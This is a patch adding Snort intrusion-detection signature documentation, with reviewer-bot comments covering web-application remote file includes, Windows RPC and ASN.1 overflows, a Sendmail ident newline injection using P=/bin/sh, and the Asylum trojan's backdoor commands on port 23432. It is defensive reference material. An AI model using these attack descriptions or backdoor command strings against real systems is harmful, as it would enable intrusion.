--- /dev/null
+++ b/doc/signatures/1108.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1108
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
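Review bot: as with the other generic web entries, the Summary and Detailed Information never say what the rule matches ('a known vulnerability on a web server or a web application'), so SID 1108 is indistinguishable from its neighbours; name the resource or request pattern the rule looks for. The remaining text is clean apart from trailing whitespace on the Impact and Detailed Information lines.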
--- /dev/null
+++ b/doc/signatures/1428.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+1428
+
+--
+Summary:
+This event is generated when network traffic indicating the use of a
+multimedia application is detected.
+
+--
+Impact:
+This may be a violation of corporate policy since these applications can
+be used to bypass security measures designed to restrict the flow of
+corporate information to destinations external to the corporation.
+
+--
+Detailed Information:
+Multimedia client applications can be used to view movies and listen to
+music files. Some also include file sharing facilities. Use of these
+programs may constitute a violation of company policy.
+
+Clients may also contain vulnerabilities that can give an attacker an
+attack vector for delivering Trojan horse programs and viruses.
+
+--
+Affected Systems:
+	All systems running multimedia applications
+
+--
+Attack Scenarios:
+A user can download files from a source external to the protected
+network that may contain malicious code hidden in the file giving an
+attacker the opportunity to gain access to a host inside the protected
+network.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
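Review bot: Corrective Action is empty in this file. Impact and Detailed Information frame the event as a policy violation with a possible malware-delivery vector, so the section should at least point the analyst to the acceptable-use policy and to blocking or restricting the application at the perimeter. The Summary also never names which multimedia application (or protocol and port) the rule matches on, so an analyst cannot tell what traffic tripped it; state that explicitly.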
--- /dev/null
+++ b/doc/signatures/100000359.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000359
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Fastpublish CMS" application running on a webserver. Access to the file "drucken.php" using a remote file being passed as the "config[fsBase]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "config[fsBase]" parameter in the "drucken.php" script used by the "Fastpublish CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Fastpublish CMS
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
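Review bot: the third paragraph of Detailed Information ("validating the credentials of a client host ...") is generic authentication-bypass boilerplate and does not describe a remote file include in drucken.php via config[fsBase]; drop it or replace it with the actual mechanism (a remote URL supplied in the parameter is included and executed by the script). Minor: "an exploitation attempt has been attempted" in the Summary is redundant, "ona web server" is missing a space, and Additional References is empty for a rule that claims "Exploits exist".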
--- /dev/null
+++ b/doc/signatures/2383.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+Sid:
+2383
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the Microsoft implementation of the ASN.1 Library.
+
+--
+Impact:
+Serious. Execution of arbitrary code, DoS.
+
+--
+Detailed Information:
+A buffer overflow condition in the Microsoft implementation of the ASN.1 
+Library. It may be possible for an attacker to exploit this condition by 
+sending specially crafted authentication packets to a host running a 
+vulnerable operating system.
+
+When the taget system decodes the ASN.1 data, exploit code may be included 
+in the data that may be excuted on the host with system level privileges. 
+Alternatively, the malformed data may cause the service to become 
+unresponsive thus causing the DoS condition to occur.
+
+--
+Affected Systems:
+	Microsoft Windows NT
+	Microsoft Windows NT Terminal Server Edition
+	Microsoft Windows 2000
+	Microsoft Windows XP
+	Microsoft Windows 2003
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0818
+
+US-CERT
+http://www.us-cert.gov/cas/techalerts/TA04-041A.html
+
+Microsoft
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms04-007.asp
+
+--
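Review bot: this file omits the Attack Scenarios section that every other signature document in the patch carries, and its final section is headed "References:" rather than "Additional References:"; both break the template that any tooling parsing these files will expect. Typos in Detailed Information: "taget" should be "target" and "excuted" should be "executed".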
--- /dev/null
+++ b/doc/signatures/2414.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2414
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the handling of ISAKMP data and SA keys.
+
+--
+Impact:
+Serious
+
+--
+Detailed Information:
+The Internet Security Association and Key Management Protocol (ISAKMP) 
+is used as a framework for an authentication method between peers using 
+secure keys.
+
+ISAKMP is a framework for authentication using cryptographic keys. It 
+specifically defines the process of key exchange as opposed to the 
+generation of a cryptographic key.
+
+ISAKMP also details the procedures for the required security 
+associations in network security services.
+
+--
+Affected Systems:
+	Kame Racoon
+
+--
+Attack Scenarios:
+The attacker may attempt to delete keys and security associations in
+hosts running the KAME IKE Daemon.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+ISAKMP:
+http://www.networksorcery.com/enp/protocol/isakmp.htm
+
+RFC:
+http://www.ietf.org/rfc/rfc2407.txt
+http://www.ietf.org/rfc/rfc2408.txt
+
+IANA:
+http://www.iana.org/assignments/isakmp-registry
+
+--
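Review bot: the first two paragraphs of Detailed Information say the same thing twice (ISAKMP is a framework for authentication using cryptographic keys) and neither describes the vulnerability the Summary promises; the only hint is in Attack Scenarios ("delete keys and security associations"). Move that into Detailed Information, state what is malformed in the ISAKMP data the rule matches, and expand Impact beyond the bare word "Serious" (deleting a peer's security associations tears down the tunnel, i.e. a denial of service). Trailing whitespace on the ISAKMP paragraph lines should be stripped.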
--- /dev/null
+++ b/doc/signatures/3014.txt
@@ -0,0 +1,81 @@
+Rule: 
+
+--
+Sid: 
+3014
+
+-- 
+Summary: 
+This event is generated when a victim host attempts to send a connection
+confirmation to an attacker using the Asylum 0.1 trojan.
+
+-- 
+Impact: 
+If successful, the attacker would gain unauthorized access to your system, enabling him to upload and execute files on your
+computer and reboot it at will, resulting in a full compromise of the victim's computer. 
+
+--
+Detailed Information:
+When executed, Asylum 0.1 opens up its assigned port (default is 23432) for communication with the attacker.
+Asylum 0.1 has four functions: Upload File, Open File, Reboot Computer, and Remove Server. 
+
+Upload File: Look for traffic on port 23432 containing UPL followed by a file location.
+Open File: Look for traffic on port 23432 containing RUN followed by a file location.
+Reboot: Look for the string "RBT" on port 23432.
+Remove Server: Look for the string "DIE" on port 23432.
+
+--
+Affected Systems:
+Windows 95/98/ME/NT/2000
+
+--
+
+Attack Scenarios: 
+The victim must first install the server. Be wary of suspicious files because they often can be backdoors in disguise.
+Once the victim mistakenly installs the server program, the attacker usually will employ an IP scanner program
+to find the IP addresses of victims that have installed the program. Then the attacker enters the IP address, port number (which 
+is assigned to the server program by the attacker: default is 23432), and presses the connect button and he has access to your computer.
+
+-- 
+
+Ease of Attack: 
+Easy. Simply a matter of pressing the connect button once the victim has installed the server.
+
+
+-- 
+
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+-- 
+
+Corrective Action:
+Delete the System Administration key (if found) in 
+HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run or
+HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices or
+HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run.
+
+Open the system.ini and (if found) replace shell=Explore.exe win32cmp.exe to shell=explore.exe
+
+Open the win.ini and (if found) delete load=c:\windows\wincmp32.exe or run=c:\windows\wincmp32.exe
+
+Find and delete the Asylum 0.1 trojan server file, usually called wincmp32.exe.
+
+Keep your anti-virus programs updated with the latest definitions.
+
+--
+Contributors:
+Original Rule Writer: Ricky Macatee <rmacatee@sourcefire.com> 
+Sourcefire Research Team
+
+-- 
+Additional References:
+http://www.pestpatrol.com/PestInfo/A/Asylum.asp
+http://www.dark-e.com/archive/trojans/asylum/01/index.shtml
+
+
+--
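Review bot: the Corrective Action steps name the trojan binary inconsistently: the system.ini line refers to "win32cmp.exe" while the win.ini line and the final step refer to "wincmp32.exe"; one is a typo and an analyst following the steps would miss the file. The shell= line also needs the restored shell written exactly (the document gives "Explore.exe"/"explore.exe", which is not the standard Windows shell name, explorer.exe; verify against a clean system.ini before shipping). Several separator lines in this file carry trailing spaces ("-- ") and there are stray blank lines around section headers; normalise them to the bare "--" used elsewhere.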
--- /dev/null
+++ b/doc/signatures/1029.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+1029
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential 
+weakness on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential 
+weaknesses in a host running Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation
+on the host, this may be the prelude to an attack against that host 
+using that information.
+
+This rule generates an event when an attempt is made to browse the scripts directory on a web server. This driectory may contain source code files for web application scripts running on the server. An attacker may be able to view the source code and use the information in further attacks against the server.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the 
+IIS implementation. The attacker might then gain administrator access to
+the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been 
+taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
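Review bot: the Summary and the first two paragraphs of Detailed Information are generic IIS boilerplate; the actual trigger is stated only in the last paragraph (an attempt to browse the scripts directory). Lead with that, and fix "driectory" to "directory". The Attack Scenarios text about retrieving "a sensitive file" should likewise be tied to source disclosure of script files from that directory, which is the impact the rule actually covers. Additional References is empty.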
--- /dev/null
+++ b/doc/signatures/3023.txt
@@ -0,0 +1,67 @@
+Rule: 
+
+--
+Sid: 
+3023
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Samba implementation.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code.
+
+--
+Detailed Information:
+Samba is a file and print serving system for heterogenous networks. It
+is available for use as a service and client on UNIX/Linux systems and as
+a client for Microsoft Windows systems.
+
+Samba uses the SMB/CIFS protocols to allow communication between client
+and server. The SMB protocol contains many commands and is commonly used
+to control network devices and systems from a remote location. A
+vulnerability exists in the way the smb daemon processes commands sent by
+a client system when accessing resources on the remote server.The problem
+exists in the allocation of memory which can be exploited by an attacker
+to cause an integer overflow, possibly leading to the execution of
+arbitrary code on the affected system with the privileges of the user
+running the smbd process.
+
+--
+Affected Systems:
+	Samba 3.0.8 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to supply specially crafted data to the smb daemon to
+overflow a buffer containing the information for the access control lists
+to be applied to files in the smb query.
+
+-- 
+Ease of Attack: 
+Difficult.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
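Review bot: Detailed Information describes the flaw as an integer overflow in memory allocation, while Attack Scenarios describes it as overflowing a buffer holding access control list data; if the integer overflow is in the size computation for that ACL buffer, say so in one place so the two sections agree. Typos: "heterogenous" should be "heterogeneous", and "server.The problem" is missing a space. Additional References is empty although Affected Systems pins this to Samba 3.0.8 and prior, so the vendor advisory should be cited.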
--- /dev/null
+++ b/doc/signatures/1180.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1180
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
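Review bot: this file never says what the rule matches, so an analyst has no way to relate an alert to a specific weakness; "Many known vulnerabilities exist ... the attack scenarios are legion" is not actionable. Name the URI or content the signature looks for and the product it belongs to, and either cite a reference for "Exploits exist" or drop that claim.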
--- /dev/null
+++ b/doc/signatures/2505.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2505
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of SSL Version 3.
+
+--
+Impact:
+Denial of Service (DoS).
+--
+Detailed Information:
+A vulnerability exists in the handling of SSL Version 3 requests that
+can be manipulated to cause a DoS condition in various software 
+implementations used on Microsoft operating systems.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library. SSL requests containing an
+invalid field, sent to vulnerable systems can cause the affected host to stop 
+handling any further requests.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems using SSL
+
+--
+Attack Scenarios:
+An attcker needs to make an SSL request to an affected system that
+contains an invalid field.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
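Review bot: the Impact line ("Denial of Service (DoS).") runs straight into the "--" separator without the blank line every other section uses, which will trip a parser keyed on the blank-line-plus-separator pattern. Typo in Attack Scenarios: "attcker" should be "attacker". Additional References is empty; Detailed Information points to a specific flaw in the Microsoft SSL library, so the vendor bulletin should be cited.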
--- /dev/null
+++ b/doc/signatures/474.txt
@@ -0,0 +1,65 @@
+Rule:
+--
+Sid:
+474
+
+--
+Summary:
+This event is generated when an ICMP Echo Request from the Windows based
+scanner SuperScan is detected.
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+SuperScan is a freely available Windows based scanner from Foundstone. 
+The scanners default behavior is to send an ICMP Echo Request before 
+starting the scan. This ICMP packet has a special payload of eight (8) bytes, 
+consisting of the number zero (0).
+
+This scanner is fairly popular among Windows users.
+
+--
+Affected Systems:
+	All
+ 
+--
+Attack Scenarios:
+SuperScan may be used as an information gathering tool to detect active hosts
+on a network by sending icmp echo requests. 
+
+--
+Ease of Attack:
+Simple.  SuperScan is widely available.
+
+--
+False Positives:
+Tools other than SuperScan may generate echo requests with the same content.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+--
+Contributors:
+Original rule writer unknown
+Snort documentation contributed by Johan Augustsson
+<johan.augustsson@adm.gu.se> and Josh Gray
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Foundstone
+http://www.foundstone.com/
+
+McAfee:
+http://vil.nai.com/vil/content/v_103727.htm
+
+--
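Review bot: Corrective Action is empty. Detailed Information gives the analyst enough to act on (an 8-byte all-zero ICMP echo payload precedes a SuperScan port scan), so at minimum suggest checking the source host for follow-on scan traffic and filtering or rate-limiting inbound echo requests at the perimeter. Also "The scanners default behavior" needs the possessive ("scanner's"), and "eight (8) bytes, consisting of the number zero (0)" reads more clearly as "eight bytes of 0x00". The False Positives entry here is a good model for the other files, which all default to "None known".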
--- /dev/null
+++ b/doc/signatures/3422.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3422
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
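Review bot: Attack Scenarios ("a request for a file with an overly long filename via a network share") does not obviously match Detailed Information, which says the trigger is malformed data sent to an RPC port; if the long filename is carried inside the DCOM request over RPC, say that explicitly so the two sections agree. Typo in Ease of Attack: "Expoit" should be "Exploit". Additional References is empty for a vulnerability with a vendor bulletin; cite it.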
--- /dev/null
+++ b/doc/signatures/100000720.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000720
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "PHPRaid" application running on a webserver. Access to the file "locations.php" using a remote file being passed as the "phpraid_dir" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpraid_dir" parameter in the "locations.php" script used by the "PHPRaid" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using PHPRaid
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
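Review bot: the "--" separators after the Sid (line "100000720"), after the Affected Systems entry and after the Contributors list are missing the blank line that precedes every other separator in this file and in the rest of the patch; that inconsistency will surface as parse errors or run-together sections. The same generic "validating the credentials of a client host" paragraph appears here as in the other remote file include documents and should be replaced with a description of the phpraid_dir include in locations.php. Also "ona web server" is missing a space.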
--- /dev/null
+++ b/doc/signatures/1226.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+1226
+
+--
+Summary:
+This event is generated when an attempt to launch an X windows application on an X windows server is made.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a compromise of all resources the machine is connected to.
+
+--
+Detailed Information:
+Implementations of the X windows system from the X consortium may use weak authentication methods when allowing remote machines to connect to a host running X windows.
+
+XDM is used to allow remote users access to the remote X window server. When configured incorrectly, this may allow an unathorised user to connect to the display.
+
+This event is generated when a user outside the protected network opens an X windows application on the remote X server.
+
+--
+Attack Scenarios:
+The remote attacker may scan the host for listening X window servers, then connect to the remote host using XDM. The attacker may then execute an X windows application on the remote host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow connections to X servers from hosts outside the protected network.
+
+Apply the appropriate vendor patches.
+
+Upgrade to the latest version of the software.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS396
+
+--
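Review bot: this file has no Affected Systems section, which the template requires; hosts running an X server reachable via XDM is the obvious entry. In Detailed Information, "unathorised" should be "unauthorised" (or "unauthorized", the spelling used elsewhere in the patch), and "X windows" should be "X Window System" or "X11" throughout. The second paragraph should also say what XDM is (the X Display Manager) before describing how a misconfiguration exposes the display.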
--- /dev/null
+++ b/doc/signatures/667.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+667
+
+--
+Summary:
+This event is generated when an external attacker attempts to exploit a vulnerability in Sendmail where newline characters in ident messages are not properly parsed.
+
+--
+Impact:
+Severe. Remote execution of arbitrary code, leading to remote root compromise. 
+
+--
+Detailed Information:
+Sendmail 8.6.10 and earlier versions contain a vulnerability related to the parsing of newline characters (\n) in commands passed from ident to Sendmail. An attacker can use a specially crafted command with newlines in an ident response to Sendmail. The message is not properly parsed and Sendmail forwards the response, with included commands, to its queue. The commands are then executed while the message awaits delivery in the Sendmail queue, causing the included arbitrary code to be executed on the server in the security context of Sendmail. 
+
+--
+Affected Systems:
+Systems running unpatched versions of Sendmail 8.6.10 or earlier.
+
+--
+Attack Scenarios:
+An attacker sends an email with newline characters and includes a path variable of P=/bin/sh. Directives included in the transmission are executed while the message remains in the Sendmail queue.
+
+--
+Ease of Attack:
+Moderate. Multiple exploits exist, but the window of opportunity is small; the vulnerability must be exploited while the message is queued for delivery and must have sufficient time (the mail server must be busy/slow) to execute the commands.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest version of Sendmail.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0204
+
+Bugtraq
+http://www.securityfocus.com/bid/2311
+
+--
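Review bot: Attack Scenarios says "An attacker sends an email with newline characters", but the Summary and Detailed Information describe the vector as a crafted ident response containing newlines, not an email; reconcile the two (per Detailed Information it is the ident response that Sendmail parses and writes to its queue). The "P=/bin/sh" detail also needs a sentence saying where it is placed (in the injected data Sendmail writes to the queue file). In Ease of Attack, "must have sufficient time (the mail server must be busy/slow)" sits awkwardly next to "Multiple exploits exist"; state which factor the "Moderate" rating is based on.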
--- /dev/null
+++ b/doc/signatures/2853.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2853
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure generate_replication_trigger
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
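Review bot: the Detailed Information sentence is broken across lines ("generate_replication_trigger" / ". This procedure is included in" / "dbms_repcat.") with the period starting a line; rejoin it as one sentence, e.g. "...in the procedure generate_replication_trigger, which is included in the dbms_repcat package." Affected Systems reads "Oracle Oracle9i" (duplicated vendor name). Additional References is empty for a named vulnerable procedure; cite the Oracle alert or CVE.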
--- /dev/null
+++ b/doc/signatures/2472.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+2472
+
+--
+Summary:
+This event is generated when an attempt is made to access the C$ default
+administrative share of a Windows host.
+
+--
+Impact:
+Serious. Possible administrator access to the host. Information 
+disclosure.
+
+--
+Detailed Information:
+By default, Windows hosts have default administrative shares of the 
+local hard drives using the format %DRIVE_LETTER% + $. Anybody with 
+administrative rights can remotely access the share.
+
+--
+Affected Systems:
+	Windows hosts.
+
+--
+Attack Scenarios:
+An attacker may be attempting to access files located on the C drive of 
+the host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow Netbios access from external networks (tcp port 139).
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Josh Sakofsky
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS339
+
+Microsoft:
+http://support.microsoft.com/default.aspx?scid=kb;en-us;100517
+
+--
